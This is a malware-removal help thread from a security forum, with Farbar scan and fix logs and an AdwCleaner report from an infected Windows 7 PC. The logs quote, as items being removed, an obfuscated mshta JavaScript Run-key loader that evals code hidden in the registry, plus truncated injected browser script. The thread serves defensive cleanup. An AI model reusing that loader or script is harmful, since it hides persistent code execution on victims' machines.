2015-06-01 19:29 - 2015-06-01 19:44 - 0827977 _____ () C:\ProgramData\zvcisfg.html
2010-09-03 16:09 - 2010-09-03 16:09 - 0000032 _____ () C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log
2010-07-17 14:24 - 2010-07-17 14:25 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2010-09-03 16:09 - 2010-09-03 16:09 - 0000032 _____ () C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log
2010-07-17 14:20 - 2010-07-17 14:20 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
2010-09-03 16:09 - 2010-09-03 16:09 - 0000032 _____ () C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log
2010-09-03 16:09 - 2010-09-03 16:09 - 0000032 _____ () C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log
2010-07-17 14:19 - 2010-07-17 14:20 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
2010-07-17 14:21 - 2010-07-17 14:24 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log
2010-09-03 16:09 - 2010-09-03 16:10 - 0000105 _____ () C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2015-05-24 14:20
 
==================== End of log ============================


 

 

 

Attached Files



BC AdBot (Login to Remove)

 


#2 nasdaq

nasdaq

  • Malware Response Team
  • 39,888 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:47 PM

Posted 03 June 2015 - 10:03 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Found out more about this infection.
http://www.bleepingcomputer.com/virus-removal/ctb-locker-ransomware-information
<<<>>

Open notepad (Start =>All Programs => Accessories => Notepad). Please copy the entire contents of the code box below.
 
start

CreateRestorePoint:
CloseProcesses:

(Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe
(Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe
HKLM-x32\...\Run: [**e7921432<*>] => mshta javascript:QYVy9thhg="Uk6";i1j9=new%20ActiveXObject("WScript.Shell");S8psbceX="Yoa299EH";YsQE36=i1j9.RegRead("HKLM\\software\\Wow6432Node\\82df414c\\31a74d1c");PFDgEA0DA="xpr";eval(YsQE36);gemCD (the data entry has 15 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2758695802-2872600399-379456914-1000\...\Policies\Explorer: [Run] "C:\Users\Giovanni\AppData\Roaming\Microsoft\Windows\IEUpdate\choice.exe"
ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} =>  No File
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-2758695802-2872600399-379456914-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{b2753f75-9f16-43f8-a6aa-560f7f38d639} <======= ATTENTION (Policy restriction on IP)
Toolbar: HKU\S-1-5-21-2758695802-2872600399-379456914-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
FF SelectedSearchEngine: mystartsearch
FF DefaultSearchEngine: mystartsearch
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\mystartsearch.xml [2015-04-27]
FF Extension: Ads Removal - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\adremoveext@adremoveext.net [2014-11-29]
FF Extension: ExstraCooupono - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\ZAXde@7.com [2015-05-08]
FF Extension: MsxmlIsland - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\{37785233-93AF-883B-AF47-11A5FE69E9A5} [2015-06-01]
FF HKLM-x32\...\Firefox\Extensions: [sweetsearch@gmail.com] - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\extensions\sweetsearch@gmail.com
CHR HKLM-x32\...\Chrome\Extension: [bopakagnckmlgajfccecajhnimjiiedh] - http://clients2.google.com/service/update2/crx
R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [118048 2015-05-27] (Elex do Brasil Participações Ltda)
S4 GameConsoleService; No ImagePath
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [260856 2015-05-27] (Elex do Brasil Participações Ltda)
S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [53568 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [108616 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [50944 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [102416 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2015-04-17] (Elex do Brasil Participações Ltda)
U0 jbhqfl; C:\Windows\System32\drivers\bdpb.sys [79064 2015-06-01] (Malwarebytes Corporation)
S3 WinRing0_1_2_0; No ImagePath
U3 catchme; \??\C:\ComboFix\catchme.sys [X]
C:\Program Files (x86)\Elex-tech
C:\Windows\System32\DRIVERS\iSafeNetFilter.sys
C:\Windows\System32\drivers\bdpb.sys

End
Save the files as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

Restart the computer normally to reset the registry.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Please download AdwCleaner by Xplode onto your Desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Click the Report button and the report will open in Notepad.
IMPORTANT
  • If you click the Clean button all items listed in the report will be removed.
If you find some false positive items or programs that you wish to keep, Close the AdwCleaner windows.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Check off the element(s) you wish to keep.
  • Click on the Clean button follow the prompts.
  • A log file will automatically open after the scan has finished.
  • Please post the content of that log file with your next answer.
  • You can find the log file at C:\AdwCleaner[Sn].txt (n is a number).
===

CHR dev: Chrome dev build detected! <======= ATTENTION

Your copy of Chrome has been compromised

Re-install Chrome

Unless you did this yourself, malware has changed your Chrome version into the Development Build. Among other things this allows malware to install any extension it wants.


Remove Chrome using the the instructions on this page.
https://support.google.com/chrome/answer/95319?hl=en

Before you do Export your Bookmarks
Chrome will export your bookmarks as a HTML file, which you can then import into another browser.

Re-install Chrome and the Bookmarks.

If you want to save all your settings refer to this page.
Follow the instructions before removing Chrome.
http://juan2geek.com/how-to-backup-and-restore-entire-google-chrome-setting/
<<<>>>


How is the computer running now?

#3 Deside93

Deside93
  • Topic Starter

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:11:47 PM

Posted 03 June 2015 - 10:52 AM

Hello Nasdaq! Thank you very much for you reply! 
I think I solved my problem yesterday with the help of a friend who suggested me to scan my pc with Bitdefender and Avetix, but I'm not sure. 
I did what you suggested and these are the results: 

THIS IS THE FIX LOG
 

Fix result of Farbar Recovery Scan Tool (x64) Version: 29-05-2015
Ran by Giovanni at 2015-06-03 17:28:52 Run:1
Running from C:\Users\Giovanni\Downloads
Loaded Profiles: Giovanni (Available Profiles: Giovanni)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
 
CreateRestorePoint:
CloseProcesses:
 
(Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe
(Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe
HKLM-x32\...\Run: [**e7921432<*>] => mshta javascript:QYVy9thhg="Uk6";i1j9=new%20ActiveXObject("WScript.Shell");S8psbceX="Yoa299EH";YsQE36=i1j9.RegRead("HKLM\\software\\Wow6432Node\\82df414c\\31a74d1c");PFDgEA0DA="xpr";eval(YsQE36);gemCD (the data entry has 15 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2758695802-2872600399-379456914-1000\...\Policies\Explorer: [Run] "C:\Users\Giovanni\AppData\Roaming\Microsoft\Windows\IEUpdate\choice.exe"
ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} =>  No File
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-2758695802-2872600399-379456914-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{b2753f75-9f16-43f8-a6aa-560f7f38d639} <======= ATTENTION (Policy restriction on IP)
Toolbar: HKU\S-1-5-21-2758695802-2872600399-379456914-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
FF SelectedSearchEngine: mystartsearch
FF DefaultSearchEngine: mystartsearch
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\mystartsearch.xml [2015-04-27]
FF Extension: Ads Removal - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\adremoveext@adremoveext.net [2014-11-29]
FF Extension: ExstraCooupono - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\ZAXde@7.com [2015-05-08]
FF Extension: MsxmlIsland - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\{37785233-93AF-883B-AF47-11A5FE69E9A5} [2015-06-01]
FF HKLM-x32\...\Firefox\Extensions: [sweetsearch@gmail.com] - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\extensions\sweetsearch@gmail.com
CHR HKLM-x32\...\Chrome\Extension: [bopakagnckmlgajfccecajhnimjiiedh] - http://clients2.google.com/service/update2/crx
R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [118048 2015-05-27] (Elex do Brasil Participações Ltda)
S4 GameConsoleService; No ImagePath
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [260856 2015-05-27] (Elex do Brasil Participações Ltda)
S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [53568 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [108616 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [50944 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [102416 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2015-04-17] (Elex do Brasil Participações Ltda)
U0 jbhqfl; C:\Windows\System32\drivers\bdpb.sys [79064 2015-06-01] (Malwarebytes Corporation)
S3 WinRing0_1_2_0; No ImagePath
U3 catchme; \??\C:\ComboFix\catchme.sys [X]
C:\Program Files (x86)\Elex-tech
C:\Windows\System32\DRIVERS\iSafeNetFilter.sys
C:\Windows\System32\drivers\bdpb.sys
 
End
*****************
 
Restore point was successfully created.
Processes closed successfully.
C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe => No running process found
C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe => No running process found
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\**e7921432<*> => value not found.
HKU\S-1-5-21-2758695802-2872600399-379456914-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\Run => value not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\0PerformanceMonitor => key not found. 
HKCR\CLSID\{3B5B973C-92A4-4855-9D3F-0F3D23332208} => key not found. 
"HKLM\SOFTWARE\Policies\Google" => key Removed successfully
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => key not found. 
HKU\S-1-5-21-2758695802-2872600399-379456914-1000\SOFTWARE\Policies\Microsoft\Internet Explorer => key not found. 
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\\ActivePolicy => value not found.
HKU\S-1-5-21-2758695802-2872600399-379456914-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => value Removed successfully
HKCR\CLSID\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => key not found. 
Firefox SelectedSearchEngine Removed successfully
Firefox DefaultSearchEngine Removed successfully
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => key Removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => key Removed successfully
"C:\Program Files (x86)\mozilla firefox\browser\searchplugins\mystartsearch.xml" => not found.
C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\adremoveext@adremoveext.net => Moved successfully.
C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\ZAXde@7.com => Moved successfully.
C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\{37785233-93AF-883B-AF47-11A5FE69E9A5} => Moved successfully.
HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\sweetsearch@gmail.com => value Removed successfully
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\bopakagnckmlgajfccecajhnimjiiedh" => key Removed successfully
iSafeService => Service not found.
GameConsoleService => Service Removed successfully
iSafeKrnl => Service not found.
iSafeKrnlBoot => Service not found.
iSafeKrnlKit => Service not found.
iSafeKrnlMon => Service not found.
iSafeKrnlR3 => Service not found.
iSafeNetFilter => Service not found.
jbhqfl => Service not found.
WinRing0_1_2_0 => Service Removed successfully
catchme => Service not found.
C:\Program Files (x86)\Elex-tech => Moved successfully.
"C:\Windows\System32\DRIVERS\iSafeNetFilter.sys" => File/Folder not found.
"C:\Windows\System32\drivers\bdpb.sys" => File/Folder not found.
 
 
The system needed a reboot. 
 
==== End of Fixlog 17:29:15 ====


THIS IS THE ADWCLEANER[S0].TXT

# AdwCleaner v4.206 - Creato file registro eventi 03/06/2015 in 17:40:30
# Aggiornato 01/06/2015 da Xplode
# Database : 2015-06-01.1 [Server]
# Sistema operativo : Windows 7 Home Premium Service Pack 1 (x64)
# Nome utente : Giovanni - GIOVANNI-HP
# In esecuzione da : C:\Users\Giovanni\Downloads\adwcleaner_4.206.exe
# Opzione : Pulizia
 
***** [ Servizi ] *****
 
 
***** [ File / Cartelle ] *****
 
Cartella Eliminato : C:\ProgramData\6203870372029230384
Cartella Eliminato : C:\ProgramData\{19cd36e7-34d1-386e-19cd-d36e734ddb9c}
Cartella Eliminato : C:\Program Files (x86)\bestadblocker
Cartella Eliminato : C:\Users\Giovanni\AppData\Local\Temp\iSafeRightKeyScan
Cartella Eliminato : C:\Users\Giovanni\AppData\Roaming\eCyber
Cartella Eliminato : C:\Users\Giovanni\AppData\Roaming\Elex-tech
Cartella Eliminato : C:\Users\Giovanni\AppData\Local\Google\Chrome\User Data\Default\Extensions\femogmcmjpjkokoojcljkpfdifkpbbpp
Cartella Eliminato : C:\ProgramData\deoopnakmfchinkaabfjchnemeihjjee
File Eliminato : C:\Windows\System32\roboot64.exe
File Eliminato : C:\Program Files (x86)\Mozilla Firefox\defaults\pref\channel-prefs.JS.xjryulf
File Eliminato : C:\Users\Giovanni\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_inst.shoppingate.info_0.localstorage
 
***** [ Attività pianificate ] *****
 
Attività Eliminato : RDReminder
Attività Eliminato : Bidaily Synchronize Task
 
***** [ Collegamenti ] *****
 
 
***** [ Registry ] *****
 
Chiave Eliminato : HKCU\Software\Mozilla\Extends
Chiave Eliminato : HKLM\SOFTWARE\97054f71-2ba2-f07c-138e-f95a4694c1fd
Chiave Eliminato : HKLM\SOFTWARE\Classes\CLSID\{BA0C978D-D909-49B6-AFE2-8BDE245DC7E6}
Chiave Eliminato : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{BA0C978D-D909-49B6-AFE2-8BDE245DC7E6}
Chiave Eliminato : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BA0C978D-D909-49B6-AFE2-8BDE245DC7E6}
Chiave Eliminato : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{BA0C978D-D909-49B6-AFE2-8BDE245DC7E6}
Chiave Eliminato : HKCU\Software\Softonic
Chiave Eliminato : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Chiave Eliminato : HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}
Chiave Eliminato : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\SearchProtect
Chiave Eliminato : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E957849A-94AC-6F46-4623-C31474E3C170}
Dati Eliminato : HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyOverride] - *.local
 
***** [ Browser web ] *****
 
-\\ Internet Explorer v11.0.9600.17801
 
 
-\\ Mozilla Firefox v36.0.1 (x86 it)
 
[wm2fy6v7.default\prefs.js] - Linea Eliminato : user_pref("browser.search.searchengine.alias", "mystartsearch");
[wm2fy6v7.default\prefs.js] - Linea Eliminato : user_pref("browser.search.searchengine.iconURL", "hxxp://www.mystartsearch.com/favicon.ico");
[wm2fy6v7.default\prefs.js] - Linea Eliminato : user_pref("browser.search.searchengine.name", "mystartsearch");
[wm2fy6v7.default\prefs.js] - Linea Eliminato : user_pref("browser.search.searchengine.url", "hxxp://www.mystartsearch.com/web/?type=ds&ts=1430038774&from=wpc&uid=WDCXWD3200BEKT-60V5T1_WD-WXF1A60K2261K2261&q={searchTerms}");
[wm2fy6v7.default\prefs.js] - Linea Eliminato : user_pref("extensions.4qgrygyZ6zVESyuH.scode", "(function(){try{if(window.self.location.href.indexOf(\"rjkErjC5rjgFrTg6qTwHqja4pn\")>-1){return;}}catch(e){}try{var d=[[\"trianglecash.com\",\"acebook\"[...]
[wm2fy6v7.default\prefs.js] - Linea Eliminato : user_pref("extensions.tSasjL7AESlknzVt.scode", "(function(){try{if(window.self.location.href.indexOf(\"rjkErjC5rjgFrTg6qTwHqja4pn\")>-1){return;}}catch(e){}try{var d=[[\"trianglecash.com\",\"acebook\"[...]
[wm2fy6v7.default\prefs.js] - Linea Eliminato : user_pref("browser.search.defaultenginename", "mystartsearch");
 
-\\ Google Chrome v43.0.2357.81
 
 
-\\ Chromium v
 
 
*************************
 
AdwCleaner[R0].txt - [4171 byte] - [03/06/2015 17:38:03]
AdwCleaner[S0].txt - [4048 byte] - [03/06/2015 17:40:30]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [4106  byte] ##########




I deleted some files with the scan you suggested and I think that now my pc is 100% free from malware and virus  :bananas: 
Thanks!!
 
 


 



#4 nasdaq

nasdaq

  • Malware Response Team
  • 39,888 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:47 PM

Posted 03 June 2015 - 12:37 PM

If all is well.

To learn more about how to protect yourself while on the internet read this little guide best security practices keep safe.
http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/
===

#5 nasdaq

nasdaq

  • Malware Response Team
  • 39,888 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:47 PM

Posted 09 June 2015 - 10:21 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users